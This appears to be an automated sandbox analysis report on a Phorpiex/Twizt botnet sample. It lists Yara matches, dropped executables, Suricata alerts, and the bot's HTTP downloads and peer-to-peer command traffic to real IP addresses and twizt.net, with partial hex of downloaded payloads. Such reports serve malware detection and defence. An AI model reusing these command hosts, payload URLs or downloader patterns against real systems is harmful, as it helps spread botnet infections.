Source: Yara match | File source: 0000001A.00000000.2493732494.0000000000410000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 71384504.exe PID: 7464, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 7488, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: sysppvrdnvs.exe PID: 8108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 2658326577.exe PID: 1400, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\2658326577.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\sysppvrdnvs.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\71384504.exe, type: DROPPED
Source: thcdVit1dX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Users\user\Desktop\thcdVit1dX.exe | File created: C:\Users\user\AppData\Local\Temp\Setup_20241026012616_Failed.log
Source: C:\Users\user\AppData\Local\Temp\4BBF.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdbA | source: thcdVit1dX.exe
Source: Binary string: D:\a\wix\wix\build\burn\Release\x86\burn.pdb | source: thcdVit1dX.exe
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004050E3 FindFirstFileW,FindClose,0_2_004050E3
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0045C110 FindFirstFileExW,0_2_0045C110
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041D64B FindFirstFileW,FindNextFileW,FindClose,0_2_0041D64B
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00401D86 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,FindClose,0_2_00401D86
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,3_2_004068E0
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0

                              Networking

                              Source: Network trafficSuricata IDS: 2856563 - Severity 1 - ETPRO MALWARE Phorpiex Domain in DNS Lookup : 192.168.2.5:54677 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49771 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 195.82.3.15:40500
                              Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49784 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 2.184.189.189:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49823 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2853292 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin : 192.168.2.5:49721 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.5:49784
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 2.180.10.247:40500
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.5:65053 -> 151.246.159.157:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49864 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.5:49812 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2853272 - Severity 1 - ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound : 185.215.113.66:80 -> 192.168.2.5:49720
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.5:49771
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exeCode function: 3_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com3_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 4_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com4_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com17_2_0040B430
                              Source: global trafficTCP traffic: 192.168.2.5:49788 -> 149.54.47.90:40500
                              Source: global trafficTCP traffic: 192.168.2.5:49829 -> 89.33.234.8:40500
                              Source: global trafficTCP traffic: 192.168.2.5:49873 -> 89.249.62.7:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 195.82.3.15:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 2.184.189.189:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 151.246.159.157:40500
                              Source: global trafficUDP traffic: 192.168.2.5:65053 -> 2.180.10.247:40500
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:17 GMTContent-Type: application/octet-streamContent-Length: 9728Last-Modified: Wed, 15 May 2024 14:33:59 GMTConnection: keep-aliveETag: "6644c7d7-2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 c7 44 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 14 00 00 00 00 00 00 19 17 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 3f d4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 24 00 00 8c 00 00 00 00 40 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 23 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7a 0c 00 00 00 10 00 00 00 0e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 0a 00 00 00 20 00 00 00 0c 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 
00 00 00 8c 03 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 40 00 00 00 04 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fe 01 00 00 00 50 00 00 00 02 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:26:20 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Thu, 10 Oct 2024 07:41:50 GMTConnection: keep-aliveETag: "6707853e-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 
74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
                              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                              Source: Joe Sandbox ViewASN Name: KAZTELECOM-ASKZ KAZTELECOM-ASKZ
                              Source: Joe Sandbox ViewASN Name: TCIIR TCIIR
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49721 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49720 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49771 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49784 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49823 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49841 -> 91.202.233.141:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49864 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 185.215.113.66:80
                              Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 149.54.47.90
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 89.33.234.8
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: unknownTCP traffic detected without corresponding DNS query: 91.202.233.141
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004C9000 EntryPoint,GetFileAttributesW,LoadLibraryExA,GetTempFileNameW,URLDownloadToFileW,DeleteFileW,CreateProcessW,0_2_004C9000
                              Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                              Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficDNS traffic detected: DNS query: twizt.net
                              Source: 71384504.exe, 00000003.00000002.2274629831.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, 71384504.exe, 00000003.00000000.2243548118.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 71384504.exe, 00000003.00000002.2274420258.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000003.2473152957.0000000004B41000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000000.2264146291.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523109899.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000002.2413964057.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysppvrdnvs.exe, 00000011.00000000.2392940461.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 2658326577.exe, 